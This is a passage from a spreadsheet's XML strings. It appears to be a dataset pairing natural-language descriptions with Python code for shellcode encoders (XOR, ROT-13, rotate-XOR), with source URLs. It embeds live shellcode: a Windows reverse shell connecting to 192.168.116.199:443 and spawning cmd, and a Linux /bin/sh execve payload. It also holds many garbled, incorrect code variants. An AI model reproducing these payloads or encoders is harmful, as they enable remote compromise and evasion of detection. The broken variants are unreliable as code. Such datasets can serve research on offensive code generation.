    <t>decoder_stub += '\x7c\x16\x05\x74\x0a\x42\x42\x42'</t>
  </si>
  <si>
    <t>add the string "\x42\x42\x83\xc0\x04\x75\xc5\xff" to the variable decoder_stub</t>
  </si>
  <si>
    <t>decoder_stub += '\x42\x42\x83\xc0\x04\x75\xc5\xff'</t>
  </si>
  <si>
    <t>add the string "\xe4\xe8\xa4\xff\xff\xff" to the variable decoder_stub</t>
  </si>
  <si>
    <t>decoder_stub += '\xe4\xe8\xa4\xff\xff\xff'</t>
  </si>
  <si>
    <t>initialize a random number generator</t>
  </si>
  <si>
    <t>random . seed ( )</t>
  </si>
  <si>
    <t>check if the total number of command-line arguments are less than 2</t>
  </si>
  <si>
    <t>print format the string 'Usage {name} [shellcode_file] with the parameter name set to the first command-line argument</t>
  </si>
  <si>
    <t>set the variable shellcode_file to the first command-line argument</t>
  </si>
  <si>
    <t>shellcode_file = sys . argv [ 1 ]</t>
  </si>
  <si>
    <t>open the file stored in shellcode_file using an alias variable f</t>
  </si>
  <si>
    <t>with open ( shellcode_file ) as f :</t>
  </si>
  <si>
    <t>read the file f as a bytearray from hexadecimal values remove whitespaces and replace all occurences of the string '\\x' with ''" and store the result in shellcode_original</t>
  </si>
  <si>
    <t>shellcode_original = bytearray . fromhex ( f . read ( ) . strip ( ) . replace ( '\\x' , '' ) )</t>
  </si>
  <si>
    <t>if the length of shellcode_original is not divisable by 4</t>
  </si>
  <si>
    <t>if len ( shellcode_original ) % 4 != 0 :</t>
  </si>
  <si>
    <t>set the variable padding equal to 4 minus the length of shellcode_original modulus 4</t>
  </si>
  <si>
    <t>padding = 4 - ( len ( shellcode_original ) % 4 )</t>
  </si>
  <si>
    <t>declare an else statement</t>
  </si>
  <si>
    <t>set the variable padding equal to 0</t>
  </si>
  <si>
    <t>padding = 0</t>
  </si>
  <si>
    <t>check if padding does not equal 0</t>
  </si>
  <si>
    <t>if padding :</t>
  </si>
  <si>
    <t>print format the string '[+] Shellcode not 4 bytes aligned, adding {} \\x90 bytes of padding...' with the parameter padding</t>
  </si>
  <si>
    <t>initialize a for loop with an iterator i with a range starting from 0 until the value of padding</t>
  </si>
  <si>
    <t>for i in range ( 0 , padding ) :</t>
  </si>
  <si>
    <t>append 0x90 to the shellcode_original variable</t>
  </si>
  <si>
    <t>shellcode_original . append ( 0x90 )</t>
  </si>
  <si>
    <t>shellcode_encoded is an empty bitearray</t>
  </si>
  <si>
    <t>shellcode_encoded = bytearray ( )</t>
  </si>
  <si>
    <t>initialize a for loop with an iterator i with a range starting from 0 until the length of shellcode_original with a step of 4</t>
  </si>
  <si>
    <t>for i in range ( 0 , len ( shellcode_original ) , 4 ) :</t>
  </si>
  <si>
    <t>set the variable xor_byte_good to the value False</t>
  </si>
  <si>
    <t>xor_byte_good = False</t>
  </si>
  <si>
    <t>start a while loop with the condition xor_byte_good if equivalent to False</t>
  </si>
  <si>
    <t>while ( xor_byte_good == False ) :</t>
  </si>
  <si>
    <t>set the variable r to a random integer between 1 and 255</t>
  </si>
  <si>
    <t>r = random . randint ( 1 , 255 )</t>
  </si>
  <si>
    <t>check if the following expression is true r bitwise xor shellcode_original at index i is not equal to 0 and r bitwise xor shellcode_original at index i+1 does not equal 0 and r bitwise xor shellcode_original at index i+2 does not equal 0 and r bitwise xor shellcode_original at index i+3 does not equal 0</t>
  </si>
  <si>
    <t>if ( r ^ shellcode_original [ i ] != 0 ) and ( r ^ shellcode_original [ i + 1 ] != 0 ) and ( r ^ shellcode_original [ i + 2 ] != 0 ) and ( r ^ shellcode_original [ i + 3 ] != 0 ) :</t>
  </si>
  <si>
    <t>set the variable xor_byte_good to the value True</t>
  </si>
  <si>
    <t>xor_byte_good = True</t>
  </si>
  <si>
    <t>append the value of the variable r to shellcode_encoded</t>
  </si>
  <si>
    <t>shellcode_encoded . append ( r )</t>
  </si>
  <si>
    <t>compute the value of shellcode_original at index i+3 bitwise xor r then append to shellcode_encoded</t>
  </si>
  <si>
    <t>shellcode_encoded . append ( shellcode_original [ i + 3 ] ^ r )</t>
  </si>
  <si>
    <t>compute the value of shellcode_original at index i+2 bitwise xor r then append to shellcode_encoded</t>
  </si>
  <si>
    <t>shellcode_encoded . append ( shellcode_original [ i + 2 ] ^ r )</t>
  </si>
  <si>
    <t>compute the value of shellcode_original at index i+1 bitwise xor r then append to shellcode_encoded</t>
  </si>
  <si>
    <t>shellcode_encoded . append ( shellcode_original [ i + 1 ] ^ r )</t>
  </si>
  <si>
    <t>compute the value of shellcode_original at index i bitwise xor r then append to shellcode_encoded</t>
  </si>
  <si>
    <t>shellcode_encoded . append ( shellcode_original [ i ] ^ r )</t>
  </si>
  <si>
    <t>append the value 0x90 to shellcode_encoded</t>
  </si>
  <si>
    <t>shellcode_encoded . append ( 0x90 )</t>
  </si>
  <si>
    <t>append the value 0xaa to shellcode_encoded</t>
  </si>
  <si>
    <t>shellcode_encoded . append ( 0xaa )</t>
  </si>
  <si>
    <t>for each element in decoder_stub convert the element to an integer representing the unicode then convert it to a hexadecimal ignore slice at index 2 until the end and join separating each element by the string '\\x'</t>
  </si>
  <si>
    <t>decoder_stub_hex = '' . join ( '\\x{}' . format ( hex ( ord ( x ) ) [ 2 : ] ) for x in decoder_stub )</t>
  </si>
  <si>
    <t>store in the variable shellcode_original_hex the hexadecimal values of shellcode_original separated by the string '\\x'</t>
  </si>
  <si>
    <t>shellcode_original_hex = '' . join ( '\\x{:02x}' . format ( x ) for x in shellcode_original )</t>
  </si>
  <si>
    <t>store in the variable shellcode_encoded_hex the hexadecimal values of shellcode_encoded separated by the string '\\x'</t>
  </si>
  <si>
    <t>shellcode_encoded_hex = '' . join ( '\\x{:02x}' . format ( x ) for x in shellcode_encoded )</t>
  </si>
  <si>
    <t>store in the variable shellcode_encoded_nasm the hexadecimal values of shellcode_encoded separated by the string '0x' and remove any trailing ','</t>
  </si>
  <si>
    <t>shellcode_encoded_nasm = '' . join ( '0x{:02x}, ' . format ( x ) for x in shellcode_encoded ) . rstrip ( ', ' )</t>
  </si>
  <si>
    <t>print format the string '[+] Original shellcode (len: {}): {}\n' with the parameters of len(shellcode_original) and shellcode_original_hex</t>
  </si>
  <si>
    <t>print format the string '[+] Encoded shellcode (len: {}): {}\n' with the parameters len(shellcode_encoded) and shellcode_encoded_hex</t>
  </si>
  <si>
    <t>print format the string '[+] Encoded shell in NASM format: {}\n' with the parameter shellcode_encoded_nasm</t>
  </si>
  <si>
    <t>print format the string '[+] Encoded shellcode /w decoder stub (len: {}): {}\n' with the parameters len(decoder_stub) + len(shellcode_encoded) and decoder_stub_hex + shellcode_encoded_hex</t>
  </si>
  <si>
    <t>random . random ( )</t>
  </si>
  <si>
    <t>'open ( shellcode_file , f )'</t>
  </si>
  <si>
    <t>'shellcode_original = bytearray . fromhex ( f . read ( ) . strip ( ) . replace ( '\\t' , '' ) )'</t>
  </si>
  <si>
    <t>if len ( shellcode_original ) % 4 != 4 :</t>
  </si>
  <si>
    <t>padding = 4 - len ( shellcode_original ) % 4</t>
  </si>
  <si>
    <t>'for i in range ( 0 , padding ) : '</t>
  </si>
  <si>
    <t>shellcode_original += 0x90</t>
  </si>
  <si>
    <t>shellcode_encoded = bitearray</t>
  </si>
  <si>
    <t>'for i in range ( 0 , len ( shellcode_original ) , 4 ) : '</t>
  </si>
  <si>
    <t>xor_byte_good = value</t>
  </si>
  <si>
    <t>while e == False :</t>
  </si>
  <si>
    <t>'r = random . randint ( 1 , 255 )'</t>
  </si>
  <si>
    <t>if ( r ^ shellcode_original [ i ] != 0 ) and ( r ^ bitwise ) and ( r ^ shellcode_original [ i + 1 ] != 0 ) and ( r ^ shellcode_original ) :</t>
  </si>
  <si>
    <t>'\\x' = hex(unicode)[2:]</t>
  </si>
  <si>
    <t>shellcode_original_hex = '' . join ( '\\x{:02x}' . format ( val ) for val in shellcode_original )</t>
  </si>
  <si>
    <t>shellcode_encoded_hex = '' . join ( '\\x{:02x}' . format ( val ) for val in shellcode_encoded )</t>
  </si>
  <si>
    <t>'shellcode_encoded_nasm = '' . join ( '0x{:02x}, ' . format ( s ) for s in shellcode_encoded ) . rstrip ( ', ' )'</t>
  </si>
  <si>
    <t>random = random . randint ( )</t>
  </si>
  <si>
    <t>open open(shellcode_file) as f:</t>
  </si>
  <si>
    <t>'\\x' = bytearray.fromhex(f.read().replace('\\x', ''))</t>
  </si>
  <si>
    <t>def var0:</t>
  </si>
  <si>
    <t>while not xor_byte_good :</t>
  </si>
  <si>
    <t>if ( r ^ bitwise [ i ] != 0 ) and ( r ^ var1 [ i + 1 ] != 0 ) and ( r ^ var1 [ i + 2 ] != 0 ) :</t>
  </si>
  <si>
    <t>return '\\x%s' % int ( int ( unicode [ 2 : ] , decoder_stub ) [ 2 : ] )</t>
  </si>
  <si>
    <t>shellcode_encoded_nasm = '' . join ( '0x{:02x}, ' . format ( s ) for s in shellcode_encoded ) . rstrip ( ', ' )</t>
  </si>
  <si>
    <t>URL: https://github.com/Potato-Industries/custom-shellcode-encoder-decoder</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Declare an empty bytes literal and store it in the variable buf</t>
  </si>
  <si>
    <t>buf = b''</t>
  </si>
  <si>
    <t>add the bytes literal "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b'</t>
  </si>
  <si>
    <t>add the bytes literal "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7'</t>
  </si>
  <si>
    <t>add the bytes literal "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf'</t>
  </si>
  <si>
    <t>add the bytes literal "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c'</t>
  </si>
  <si>
    <t>add the bytes literal "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01'</t>
  </si>
  <si>
    <t>add the bytes literal "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31'</t>
  </si>
  <si>
    <t>add the bytes literal "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d'</t>
  </si>
  <si>
    <t>add the bytes literal "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66'</t>
  </si>
  <si>
    <t>add the bytes literal "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0'</t>
  </si>
  <si>
    <t>add the bytes literal "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f'</t>
  </si>
  <si>
    <t>add the bytes literal "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68'</t>
  </si>
  <si>
    <t>add the bytes literal "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8'</t>
  </si>
  <si>
    <t>add the bytes literal "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00'</t>
  </si>
  <si>
    <t>add the bytes literal "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f'</t>
  </si>
  <si>
    <t>add the bytes literal "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x74\xc7\x68" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x74\xc7\x68'</t>
  </si>
  <si>
    <t>add the bytes literal "\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5'</t>
  </si>
  <si>
    <t>add the bytes literal "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec'</t>
  </si>
  <si>
    <t>add the bytes literal "\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89'</t>
  </si>
  <si>
    <t>add the bytes literal "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66'</t>
  </si>
  <si>
    <t>add the bytes literal "\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44'</t>
  </si>
  <si>
    <t>add the bytes literal "\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68'</t>
  </si>
  <si>
    <t>add the bytes literal "\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30'</t>
  </si>
  <si>
    <t>add the bytes literal "\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68'</t>
  </si>
  <si>
    <t>add the bytes literal "\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0'</t>
  </si>
  <si>
    <t>add the bytes literal "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" to the variable buf</t>
  </si>
  <si>
    <t>buf += b'\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5'</t>
  </si>
  <si>
    <t>initialize the variable encoded_shellcode to an empty string</t>
  </si>
  <si>
    <t>initialize the variable encoded_nasm to an empty string</t>
  </si>
  <si>
    <t>encoded_nasm = ''</t>
  </si>
  <si>
    <t>Make a for loop for each x in the bytearray of buf</t>
  </si>
  <si>
    <t>for x in bytearray ( buf ) :</t>
  </si>
  <si>
    <t>set the variable y to x bitwise xor of 0x88</t>
  </si>
  <si>
    <t>y = x ^ 0x88</t>
  </si>
  <si>
    <t>set x to y minus 0x10</t>
  </si>
  <si>
    <t>x = y - 0x10</t>
  </si>
  <si>
    <t>set y to x bitwise xor of 0x97</t>
  </si>
  <si>
    <t>y = x ^ 0x97</t>
  </si>
  <si>
    <t>set x to y minus 0x2</t>
  </si>
  <si>
    <t>x = y - 0x2</t>
  </si>
  <si>
    <t>set the variable z to bitwise not x</t>
  </si>
  <si>
    <t>z = ~ x</t>
  </si>
  <si>
    <t>add the string value '\\x' to the variable encoded_shellcode</t>
  </si>
  <si>
    <t>Convert the value of z bitwise and 0xff to a hexadecimal then add it to the variable encoded_shellcode</t>
  </si>
  <si>
    <t>encoded_shellcode += '%02x' % ( z &amp; 0xff )</t>
  </si>
  <si>
    <t>add the string value '0x' to the variable encoded_nasm</t>
  </si>
  <si>
    <t>encoded_nasm += '0x'</t>
  </si>
  <si>
    <t>Convert the value of z bitwise and 0xff to a hexadecimal then add it to the variable encoded_nasm followed by ','</t>
  </si>
  <si>
    <t>encoded_nasm += '%02x, ' % ( z &amp; 0xff )</t>
  </si>
  <si>
    <t>print the string "Encoded shellcode:"</t>
  </si>
  <si>
    <t>print the contents of the variable encoded_shellcode</t>
  </si>
  <si>
    <t>print the string 'Shellcode for nasm:'</t>
  </si>
  <si>
    <t>print the contents of the variable encoded_nasm</t>
  </si>
  <si>
    <t>output the string "Shellcode Length: " along with the parameter len(bytearray(encoded_shellcode))</t>
  </si>
  <si>
    <t>'encoded_nasm += '%02x, ' % ( z &amp; 0xff )'</t>
  </si>
  <si>
    <t>var += b'\xae\xf2\xc4\xbb\x03A\xcd\x8bR\x10\x8bJ&lt;'</t>
  </si>
  <si>
    <t>y = x ^ bitwise</t>
  </si>
  <si>
    <t>URL: https://medium.com/@d338s1/shellcode-xor-encoder-decoder-d8360e41536f</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Declare a tuple called shellcode and add the string "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" into it</t>
  </si>
  <si>
    <t>initialize an empty string variable called encoded</t>
  </si>
  <si>
    <t>initialize an empty string variable called encoded2</t>
  </si>
  <si>
    <t>convert shellcode to a bytearray and store its length in the variable n</t>
  </si>
  <si>
    <t>n = len ( bytearray ( shellcode ) )</t>
  </si>
  <si>
    <t>output the string 'Encoded shellcode ...' to stdout</t>
  </si>
  <si>
    <t>compute bitwise xor of the first element in shellcode converted into a bytearray and the second element of shellcode converted into a byte array</t>
  </si>
  <si>
    <t>y = bytearray ( shellcode ) [ 0 ] ^ bytearray ( shellcode ) [ 1 ]</t>
  </si>
  <si>
    <t>add the string value '\\x' to the variable encoded</t>
  </si>
  <si>
    <t>Convert the value of y to a hexadecimal then add it to the variable encoded</t>
  </si>
  <si>
    <t>add the string value '0x' to the variable encoded2</t>
  </si>
  <si>
    <t>Convert the value of y to a hexadecimal, concatenate the result with the string ',' and then add it to the variable encoded2</t>
  </si>
  <si>
    <t>compute bitwise xor of y and the first element of shellcode converted into a byte array and store the result in the variable y</t>
  </si>
  <si>
    <t>y ^= bytearray ( shellcode ) [ 1 ]</t>
  </si>
  <si>
    <t>set the variable n to the value 1</t>
  </si>
  <si>
    <t>n = 1</t>
  </si>
  <si>
    <t>declare a for loop with an iterator x for each element in shellcode starting from index 2 converted into a bytearray</t>
  </si>
  <si>
    <t>for x in bytearray ( shellcode ) [ 2 : ] :</t>
  </si>
  <si>
    <t>check if x is equivalent to the element n in shellcode converted into a bytearray</t>
  </si>
  <si>
    <t>if x == bytearray ( shellcode ) [ n ] :</t>
  </si>
  <si>
    <t>increment the variable n by 1</t>
  </si>
  <si>
    <t>n += 1</t>
  </si>
  <si>
    <t>set the variable y equal to x bitwise xor the element n of shellcode converted into a bytearray</t>
  </si>
  <si>
    <t>y = x ^ bytearray ( shellcode ) [ n ]</t>
  </si>
  <si>
    <t>print the variable encoded to stdout</t>
  </si>
  <si>
    <t>print the variable encoded2 to stdout</t>
  </si>
  <si>
    <t>output the string "Len: " along with the parameter len(bytearray(shellcode))</t>
  </si>
  <si>
    <t>shellcode = ( shellcode + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' )</t>
  </si>
  <si>
    <t>'bits = int ( bitwise ( shellcode [ 0 ] ) , int ( shellcode [ 1 ] ) ) ^ shellcode'</t>
  </si>
  <si>
    <t>n = len ( bytearray )</t>
  </si>
  <si>
    <t>mask = shellcode ( bytearray [ 0 ] , bytearray ( bitwise ) [ 1 ] ) ^ shellcode</t>
  </si>
  <si>
    <t>y = y ^ bytearray ( shellcode [ 0 ] )</t>
  </si>
  <si>
    <t>y = x ^ shellcode ( bytearray ) [ n ]</t>
  </si>
  <si>
    <t>URL: https://www.abatchy.com/2017/05/rot-n-shellcode-encoder-linux-x86</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Declare a tuple shellcode and add the string "\x31\xc0\x50\x89\xe2\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\xb0\x0b\xcd\x80" into it</t>
  </si>
  <si>
    <t>shellcode = ( '\x31\xc0\x50\x89\xe2\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\xb0\x0b\xcd\x80' )</t>
  </si>
  <si>
    <t>set the variable magic to the value 13</t>
  </si>
  <si>
    <t>magic = 13</t>
  </si>
  <si>
    <t>initialize an empty string variable called encoded1</t>
  </si>
  <si>
    <t>encoded1 = ''</t>
  </si>
  <si>
    <t>Make a for loop for each i in the bytearray of shellcode</t>
  </si>
  <si>
    <t>Store in the variable j the sum of i and magic modulus 256</t>
  </si>
  <si>
    <t>j = ( i + magic ) % 256</t>
  </si>
  <si>
    <t>add the string value '\\x' to the variable encoded1</t>
  </si>
  <si>
    <t>encoded1 += '\\x'</t>
  </si>
  <si>
    <t>Convert the value of j to a hexadecimal then add it to the variable encoded1</t>
  </si>
  <si>
    <t>encoded1 += '%02x' % j</t>
  </si>
  <si>
    <t>Convert the value of j to a hexadecimal then add it to the variable encoded2 followed by the string ', '</t>
  </si>
  <si>
    <t>encoded2 += '%02x, ' % j</t>
  </si>
  <si>
    <t>print format the string "Format 1: {0}" with the parameter encoded1</t>
  </si>
  <si>
    <t>print format the string "Format 2: {0}" with the parameter encoded2</t>
  </si>
  <si>
    <t>URL: https://xoban.info/blog/2018/12/08/shellcode-encoder- decoder/</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>define a method named mask that takes in n as a parameter</t>
  </si>
  <si>
    <t>def mask ( n ) :</t>
  </si>
  <si>
    <t>check if n is greater or equals to 0</t>
  </si>
  <si>
    <t>if n &gt;= 0 :</t>
  </si>
  <si>
    <t>return 2 to the power of n and subtract 1</t>
  </si>
  <si>
    <t>return 2 ** n - 1</t>
  </si>
  <si>
    <t>return the value of 0</t>
  </si>
  <si>
    <t>return 0</t>
  </si>
  <si>
    <t>define a method named rol with the parameters n, rotations, and width. Width has a default value of 8</t>
  </si>
  <si>
    <t>def rol ( n , rotations , width = 8 ) :</t>
  </si>
  <si>
    <t>store in the variable rotations the modulus of rotations and width</t>
  </si>
  <si>
    <t>rotations %= width</t>
  </si>
  <si>
    <t>check if rotations is less than the value of 1</t>
  </si>
  <si>
    <t>if rotations &lt; 1 :</t>
  </si>
  <si>
    <t>return the value of n</t>
  </si>
  <si>
    <t>return n</t>
  </si>
  <si>
    <t>store in the variable n the result of the bitwise and operation between n and the function mask with the parameter width</t>
  </si>
  <si>
    <t>n &amp;= mask ( width )</t>
  </si>
  <si>
    <t>call the function mask with the argument width and save the return value in mask_value</t>
  </si>
  <si>
    <t>mask_value = mask ( width )</t>
  </si>
  <si>
    <t>return the result of bitwise left shift of n by rotations bitwise and with mask_value bitwise or n  bitwise right shift by the subtraction of rotations from width</t>
  </si>
  <si>
    <t>return ( ( n &lt;&lt; rotations ) &amp; mask_value ) | ( n &gt;&gt; ( width - rotations ) )</t>
  </si>
  <si>
    <t>define a method named ror with the parameters n, rotations, and width. Width has a default value of 8</t>
  </si>
  <si>
    <t>def ror ( n , rotations , width = 8 ) :</t>
  </si>
  <si>
    <t>check if the variable rotations is less than 1</t>
  </si>
  <si>
    <t>return the value n</t>
  </si>
  <si>
    <t>return the result of n bitwise right shift with rotations or n bitwise left shift by width minus rotations and the bitwise and operation with mask_value</t>
  </si>
  <si>
    <t>return ( n &gt;&gt; rotations ) | ( ( n &lt;&lt; ( width - rotations ) ) &amp; mask_value )</t>
  </si>
  <si>
    <t>store in the variable shellcode b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"</t>
  </si>
  <si>
    <t>shellcode = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' ;</t>
  </si>
  <si>
    <t>initialize an empty string variable called decoded</t>
  </si>
  <si>
    <t>decoded = ''</t>
  </si>
  <si>
    <t>initialize an empty string variable called decoded2</t>
  </si>
  <si>
    <t>decoded2 = ''</t>
  </si>
  <si>
    <t>Make a for loop for each x in the bytearray of shellcode</t>
  </si>
  <si>
    <t>add the string value '\\x' to the variable decoded</t>
  </si>
  <si>
    <t>decoded += '\\x'</t>
  </si>
  <si>
    <t>Convert the variable x to a hexadecimal and store it in the variable decoded</t>
  </si>
  <si>
    <t>decoded += '%02x' % x</t>
  </si>
  <si>
    <t>add the string value '0x' to the variable decoded</t>
  </si>
  <si>
    <t>decoded2 += '0x'</t>
  </si>
  <si>
    <t>Convert the variable x to a hexadecimal and add it to the variable decoded2 followed by ','</t>
  </si>
  <si>
    <t>decoded2 += '%02x, ' % x</t>
  </si>
  <si>
    <t>generate a random integer between 1 and 8 and store it in a variable called rand</t>
  </si>
  <si>
    <t>rand = random . randint ( 1 , 8 )</t>
  </si>
  <si>
    <t>assign the variable x the value of the function rol with x and rand as parameters</t>
  </si>
  <si>
    <t>x = rol ( x , rand )</t>
  </si>
  <si>
    <t>assign the variable x the value of the bitwise xor operation of x and rand</t>
  </si>
  <si>
    <t>x = x ^ rand</t>
  </si>
  <si>
    <t>Convert the variable x to a hexadecimal and add it to the variable encoded</t>
  </si>
  <si>
    <t>Convert the variable rand to a hexadecimal and add it to the variable encoded</t>
  </si>
  <si>
    <t>encoded += '\\x%02x' % rand</t>
  </si>
  <si>
    <t>Convert the variable x to a hexadecimal. Concatenate the result with the string ',' add the result to the variable encoded2</t>
  </si>
  <si>
    <t>print 90 dashes</t>
  </si>
  <si>
    <t>print the string "Decoded shellcode:"</t>
  </si>
  <si>
    <t>print the value of decoded</t>
  </si>
  <si>
    <t>print all the values in decoded2 excluding the last value</t>
  </si>
  <si>
    <t>print all the values in encoded2 excluding the last value</t>
  </si>
  <si>
    <t>output the string "Shellcode Length:" along with the parameter len(bytearray(shellcode))</t>
  </si>
  <si>
    <t>'def rol ( n , rotations , rotations , width = 8 ) : '</t>
  </si>
  <si>
    <t>rotations = rotations % width</t>
  </si>
  <si>
    <t>if rot &lt; 1 :</t>
  </si>
  <si>
    <t>n &amp;= mask</t>
  </si>
  <si>
    <t>return bitwise ( n &gt;&gt; rotations &amp; mask_value - n &gt;&gt; width - rotations )</t>
  </si>
  <si>
    <t>'def ror ( n , rotations , rotations , width = 8 ) : '</t>
  </si>
  <si>
    <t>return n &gt;&gt; rotations | n &lt;&lt; width &amp; bitwise</t>
  </si>
  <si>
    <t>shellcode = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'</t>
  </si>
  <si>
    <t>decoded = '%02x' % x</t>
  </si>
  <si>
    <t>decoded += '0x'</t>
  </si>
  <si>
    <t>'decoded2 += '%02x, ' % x'</t>
  </si>
  <si>
    <t>'random = random . randint ( 1 , 8 )'</t>
  </si>
  <si>
    <t>'x = rol ( x , rand )'</t>
  </si>
  <si>
    <t>encoded += '%02x' % rand</t>
  </si>
  <si>
    <t>rot = rotations % width</t>
  </si>
  <si>
    <t>return n ( n )</t>
  </si>
  <si>
    <t>return n &lt;&lt; rotations &amp; bitwise | n &gt;&gt; width - rotations</t>
  </si>
  <si>
    <t>return n &gt;&gt; rotations | n &lt;&lt; width - rotations &amp; mask_value</t>
  </si>
  <si>
